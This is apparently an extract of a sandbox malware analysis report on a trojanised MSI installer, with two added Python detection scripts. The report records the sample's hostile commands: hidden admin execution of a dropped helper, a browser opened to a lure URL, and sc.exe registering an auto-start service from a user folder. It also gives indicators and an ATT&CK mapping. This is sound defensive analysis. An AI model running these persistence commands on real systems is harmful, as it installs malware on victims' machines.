            Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Code function: 5_2_00CBBF6F rdtsc
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AF83BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B103E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B0843F mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B203E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B1843F mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B11533 GetProcessHeap
            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI5DCF.tmp "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AF83BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AFC3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AF8553 SetUnhandledExceptionFilter
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AF7B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B0C3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B083BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B08553 SetUnhandledExceptionFilter
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B07B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AD7660 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongW
            Source: C:\Windows\Installer\MSI5DCF.tmp | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc start MeuServico
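The process-creation rows above are the observable part of the sample's install and persistence path: msiexec.exe launches the extracted MSI5DCF.tmp helper with /RunAsAdmin, the helper runs Windows10.cmd from the user's Documents folder through cmd.exe, cmd.exe opens the lure page in chrome.exe, and sc.exe registers an auto-start service named MeuServico whose binary sits under the user's Pictures folder, then starts it. The Python below is an added illustration, not part of the Joe Sandbox report: it runs a small rule set over constructed Sysmon Event ID 1-style process-creation records modelled on those rows. Field names follow Sysmon; the process IDs, the services.exe parent of msiexec.exe and the benign VendorUpdater row (there to show the binPath allow-list not firing) are made up. Service installation also produces event 7045 in the System log, which is worth correlating when the sc.exe invocation itself is not captured.

```python
"""Detection rules for the installer-to-service chain: msiexec.exe spawning a
*.tmp helper under the Windows Installer directory with /RunAsAdmin, that helper
running a .cmd from a user profile, cmd.exe opening a URL in a browser, and
sc.exe registering and starting an auto-start service whose binary sits outside
Windows or Program Files."""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
# Locations a legitimately installed service binary is expected to run from.
TRUSTED_SERVICE_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
INSTALLER_DIR = "c:\\windows\\installer\\"

SC_CREATE = re.compile(
    r'\bcreate\s+(?P<svc>\S+).*?\bbinpath=\s*(?:"(?P<quoted>[^"]*)"|(?P<bare>\S+))', re.I)
SC_START = re.compile(r"\bstart\s+(?P<svc>\S+)", re.I)
USER_SCRIPT = re.compile(r"\\users\\[^\\]+\\.*?\.(?:cmd|bat)\b", re.I)
URL = re.compile(r"https?://\S+", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_installer_tmp(path):
    low = path.lower()
    return low.startswith(INSTALLER_DIR) and low.endswith(".tmp")


def detect(events):
    """Run the rules over chronologically ordered process-creation records
    (Sysmon Event ID 1 field names) and return (rule, pid, detail) tuples."""
    hits = []
    untrusted_services = {}  # service name (lower) -> binPath, from sc.exe create
    for ev in events:
        image, parent, cmd, pid = ev["Image"], ev["ParentImage"], ev["CommandLine"], ev["ProcessId"]
        if basename(parent) == "msiexec.exe" and is_installer_tmp(image) and "/runasadmin" in cmd.lower():
            hits.append(("installer_tmp_runasadmin", pid, cmd))
        if is_installer_tmp(parent) and basename(image) == "cmd.exe":
            m = USER_SCRIPT.search(cmd)
            if m:
                hits.append(("installer_tmp_runs_user_script", pid, m.group(0)))
        if basename(parent) == "cmd.exe" and basename(image) in BROWSERS:
            m = URL.search(cmd)
            if m:
                hits.append(("cmd_opens_browser_url", pid, m.group(0)))
        if basename(image) == "sc.exe":
            m = SC_CREATE.search(cmd)
            if m:
                bin_path = (m.group("quoted") or m.group("bare") or "").strip()
                if not bin_path.lower().startswith(TRUSTED_SERVICE_DIRS):
                    untrusted_services[m.group("svc").lower()] = bin_path
                    hits.append(("service_created_untrusted_binpath", pid, f"{m.group('svc')} -> {bin_path}"))
            else:
                # Only a service we already saw created from an untrusted path is of interest here.
                s = SC_START.search(cmd)
                if s and s.group("svc").lower() in untrusted_services:
                    hits.append(("untrusted_service_started", pid, s.group("svc")))
    return hits


# Constructed Sysmon-style records modelled on the report's process tree; PIDs, the
# services.exe parent of msiexec.exe and the benign VendorUpdater row are made up.
SAMPLE_EVENTS = [
    {"ProcessId": 1804, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\system32\msiexec.exe /V"},
    {"ProcessId": 2416, "Image": r"C:\Windows\Installer\MSI5DCF.tmp",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow '
                    r'"C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents' + "\\"},
    {"ProcessId": 2520, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\Installer\MSI5DCF.tmp",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"'},
    {"ProcessId": 2608, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized '
                    r"--single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php"},
    {"ProcessId": 2700, "Image": r"C:\Windows\SysWOW64\sc.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto'},
    {"ProcessId": 2712, "Image": r"C:\Windows\SysWOW64\sc.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'sc create VendorUpdater binPath= "C:\Program Files\Vendor\updater.exe" start= auto'},
    {"ProcessId": 2724, "Image": r"C:\Windows\SysWOW64\sc.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": "sc start MeuServico"},
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:<36} pid={pid} {detail}")
```

The allow-list on binPath is deliberately coarse: a service pointing into a user profile, ProgramData or a removable drive is the signal, and the rules are stateful only for the create/start pair so that an `sc start` of a service installed from a trusted location is not reported.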
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AF801C cpuid
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AF71C1 GetLocaleInfoEx
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AE2161 GetLocaleInfoEx,FormatMessageA
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B136B6 EnumSystemLocalesW
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B0C7A2 EnumSystemLocalesW
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B1379C EnumSystemLocalesW
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B13701 EnumSystemLocalesW
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B13827 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B13A7A GetLocaleInfoW
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B13BA3 GetLocaleInfoW,GetLocaleInfoW,GetACP
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B13CA9 GetLocaleInfoW
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B0CD1F GetLocaleInfoW
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B13D78 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B071C1 GetLocaleInfoEx
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00AF2161 GetLocaleInfoEx,FormatMessageA
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B236B6 EnumSystemLocalesW
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B1C7A2 EnumSystemLocalesW
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B2379C EnumSystemLocalesW
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B23701 EnumSystemLocalesW
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B23827 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B23A7A GetLocaleInfoW
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B23BA3 GetLocaleInfoW,GetLocaleInfoW,GetACP
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B23CA9 GetLocaleInfoW
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B1CD1F GetLocaleInfoW
            Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B23D78 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00AF8615 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B0D192 GetTimeZoneInformation
            Source: windows10.exe, 0000001E.00000003.2674334142.000000000070F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s Defender\MsMpeng.exe
            Source: windows10.exe, 0000001D.00000002.4201784055.0000000000876000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000002.4159390497.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011022343.0000000000713000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3121597081.0000000000711000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2890489364.0000000000701000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.0000000000701000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.0000000000711000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3009374102.0000000000711000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.0000000000702000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3006704760.000000000070F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: windows10.exe, 0000001E.00000003.3406241581.0000000000711000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            (The same six Security Center queries repeat, in the same order, for another 161 lines of the report.)
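            Joe Sandbox prints one line per observed IWbemServices call, which is why the six Security Center enumerations above appear over and over. The Python below is added here as an example and is not part of the Joe Sandbox report: it parses lines in exactly that extracted format and collapses them into one Security Software Discovery finding per process. The sample input is constructed from the report's own lines, plus one made-up root\cimv2 query (marked in the code) to show that unrelated WMI calls are parsed but not counted; T1518.001 is the ATT&CK sub-technique ID for Security Software Discovery.

```python
import re
from collections import Counter

# Added example, not part of the Joe Sandbox report: collapse the report's
# repeated "WMI Queries" lines into one finding per process.
#
# Joe Sandbox emits one line per observed IWbemServices call, so a sample that
# polls Security Center in a loop produces hundreds of near-identical lines.
# Enumerating AntiVirusProduct / AntiSpywareProduct / FirewallProduct in
# root\SecurityCenter (the Windows XP namespace) or root\SecurityCenter2
# (Windows Vista and later) is how a process discovers installed security
# software; ATT&CK tracks it as T1518.001, Security Software Discovery.

SECURITY_CENTER_NAMESPACES = {r"root\securitycenter", r"root\securitycenter2"}
SECURITY_PRODUCT_CLASSES = {"AntiVirusProduct", "AntiSpywareProduct", "FirewallProduct"}

# In the extracted report text the process path runs straight into the words
# "WMI Queries", so the process group is non-greedy and stops at that marker.
WMI_LINE = re.compile(
    r"^\s*Source:\s*(?P<proc>.+?)WMI Queries:\s*"
    r"IWbemServices::(?P<method>\w+)\s*-\s*(?P<ns>[^\s:]+)\s*:\s*(?P<cls>\S+)\s*$"
)

# Constructed sample input: the six distinct queries from the report, repeated
# twice, plus one made-up root\cimv2 query (not from the report) to show that
# unrelated WMI calls are parsed but not counted as security-software discovery.
SAMPLE_LINES = r"""
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_OperatingSystem
"""


def parse_wmi_queries(text):
    """Return one (process, method, namespace, class) tuple per matching line."""
    records = []
    for line in text.splitlines():
        match = WMI_LINE.match(line)
        if match:
            records.append((match["proc"], match["method"], match["ns"], match["cls"]))
    return records


def security_software_queries(records):
    """Count Security Center product enumerations per process, keyed by (namespace, class)."""
    per_process = {}
    for proc, _method, namespace, cls in records:
        if namespace.lower() in SECURITY_CENTER_NAMESPACES and cls in SECURITY_PRODUCT_CLASSES:
            per_process.setdefault(proc, Counter())[(namespace, cls)] += 1
    return per_process


def findings(per_process):
    """One human-readable finding per process that enumerated security products."""
    lines = []
    for proc, counts in sorted(per_process.items()):
        total = sum(counts.values())
        namespaces = sorted({ns for ns, _ in counts})
        classes = sorted({cls for _, cls in counts})
        lines.append(
            f"{proc}: Security Software Discovery (T1518.001) - "
            f"{total} enumerations of {', '.join(classes)} in {', '.join(namespaces)}"
        )
    return lines


if __name__ == "__main__":
    records = parse_wmi_queries(SAMPLE_LINES)
    for finding in findings(security_software_queries(records)):
        print(finding)
```

            Pasting the full WMI Queries block of a report into SAMPLE_LINES turns the per-call listing into a per-process count; a process that hits both root\SecurityCenter and root\SecurityCenter2 is checking for products registered under either namespace, not just the modern one.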
            MITRE ATT&CK matrix (one line per tactic; a number before a technique is reproduced from the report's matrix cell, and techniques without one had no matching signature):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: 31 Windows Management Instrumentation; 1 Native API; 2 Command and Scripting Interpreter; 1 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: 1 DLL Side-Loading; 1 Windows Service; 11 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Windows Service; 11 Process Injection; 11 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 File Deletion; 121 Masquerading; 5 Virtualization/Sandbox Evasion; 11 Process Injection
            Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: 2 System Time Discovery; 11 Peripheral Device Discovery; 2 File and Directory Discovery; 75 System Information Discovery; 191 Security Software Discovery; 5 Virtualization/Sandbox Evasion; 2 Process Discovery; System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: 1 Archive Collected Data; 1 Credential API Hooking; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: 3 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1450377
            Sample: CrzA2u67LQ.msi
            Startdate: 01/06/2024
            Architecture: WINDOWS
            Score: 40

            Signatures attached to the sample node:
              Multi AV Scanner detection for domain / URL
              Multi AV Scanner detection for dropped file
              Multi AV Scanner detection for submitted file
              2 other signatures

            Process tree recovered from the graph (node numbers in parentheses are the graph's own; the numbers after a process name are the graph's count badges, which the legend defines as created registry values and created files):

              sample (2)
                msiexec.exe (8) 51 54
                  dropped: C:\Windows\Installer\MSI5DEF.tmp, PE32; C:\Windows\Installer\MSI5DCF.tmp, PE32; C:\Windows\Installer\MSI5820.tmp, PE32; 6 other malicious files
                  signature: Drops executables to the windows directory (C:\Windows) and starts them
                  windows10.exe (19)
                    signature: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                    windows10.exe (39)
                      signature: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                      windows10.exe (55)
                        signature: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                    windows10.exe (42)
                    windows10.exe (44)
                    2 other processes (53)
                  MSI5DCF.tmp (22) 1
                    cmd.exe (46) 1
                      conhost.exe (58)
                      sc.exe (60) 1
                      sc.exe (62) 1
                  2 other processes (35)
                windows10.exe (12)
                  signature: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                  windows10.exe (24)
                    windows10.exe (48)
                  windows10.exe (26)
                  windows10.exe (28)
                  2 other processes (37)
                cmd.exe (14) 13
                  chrome.exe (30)
                    network: 192.168.2.4, ports 138, 443, 49723, unknown unknown; 192.168.2.5, unknown unknown; 2 other IPs or domains
                    chrome.exe (50)
                      network: www.google.com 172.217.18.4, ports 443, 49739, 49752, GOOGLEUS United States; 216.58.206.68, ports 443, 49756, GOOGLEUS United States; winrarbrasil.from-mn.com 45.90.123.184, ports 443, 49735, 49736, DEDIPATH-LLCUS Germany
                  conhost.exe (33)
                2 other processes (16)
                  network: 127.0.0.1 unknown unknown

            Source | Detection | Scanner | Label
            CrzA2u67LQ.msi | 27% | Virustotal |
            CrzA2u67LQ.msi | 32% | ReversingLabs | Win32.Trojan.InjectorX

            Source | Detection | Scanner | Label
            C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll | 100% | Joe Sandbox ML |
            C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll | 49% | ReversingLabs | Win32.Trojan.InjectorX
            C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll | 34% | Virustotal |
            C:\Users\user\Pictures\fotosdaviagem\windows10.exe | 3% | ReversingLabs |
            C:\Users\user\Pictures\fotosdaviagem\windows10.exe | 5% | Virustotal |
            C:\Windows\Installer\MSI55AB.tmp | 0% | ReversingLabs |
            C:\Windows\Installer\MSI55AB.tmp | 1% | Virustotal |
            C:\Windows\Installer\MSI5723.tmp | 0% | ReversingLabs |
            C:\Windows\Installer\MSI5723.tmp | 1% | Virustotal |
            C:\Windows\Installer\MSI5762.tmp | 0% | ReversingLabs |
            C:\Windows\Installer\MSI5762.tmp | 1% | Virustotal |
            C:\Windows\Installer\MSI5783.tmp | 0% | ReversingLabs |
            C:\Windows\Installer\MSI5783.tmp | 1% | Virustotal |
            C:\Windows\Installer\MSI5820.tmp | 0% | ReversingLabs |
            C:\Windows\Installer\MSI5820.tmp | 1% | Virustotal |
            C:\Windows\Installer\MSI5DCF.tmp | 0% | ReversingLabs |
            C:\Windows\Installer\MSI5DCF.tmp | 0% | Virustotal |
            C:\Windows\Installer\MSI5DEF.tmp | 0% | ReversingLabs |
            C:\Windows\Installer\MSI5DEF.tmp | 0% | Virustotal |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
https://g.live.com/odclientsettings/Prod.C: | 0% | URL Reputation | safe
https://g.live.com/odclientsettings/ProdV2.C: | 0% | URL Reputation | safe
https://g.live.com/odclientsettings/ProdV2.C: | 0% | URL Reputation | safe
https://g.live.com/odclientsettings/ProdV2 | 0% | URL Reputation | safe
http://www.indyproject.org/ | 0% | URL Reputation | safe
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | 0% | URL Reputation | safe
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | 0% | URL Reputation | safe
http://ip-api.com/json/ | 0% | Virustotal | -
http://www.audio-tool.net | 5% | Virustotal | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
winrarbrasil.from-mn.com | 45.90.123.184 | true | false | - | unknown
www.google.com | 172.217.18.4 | true | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://winrarbrasil.from-mn.com/favicon.ico | false | - | unknown
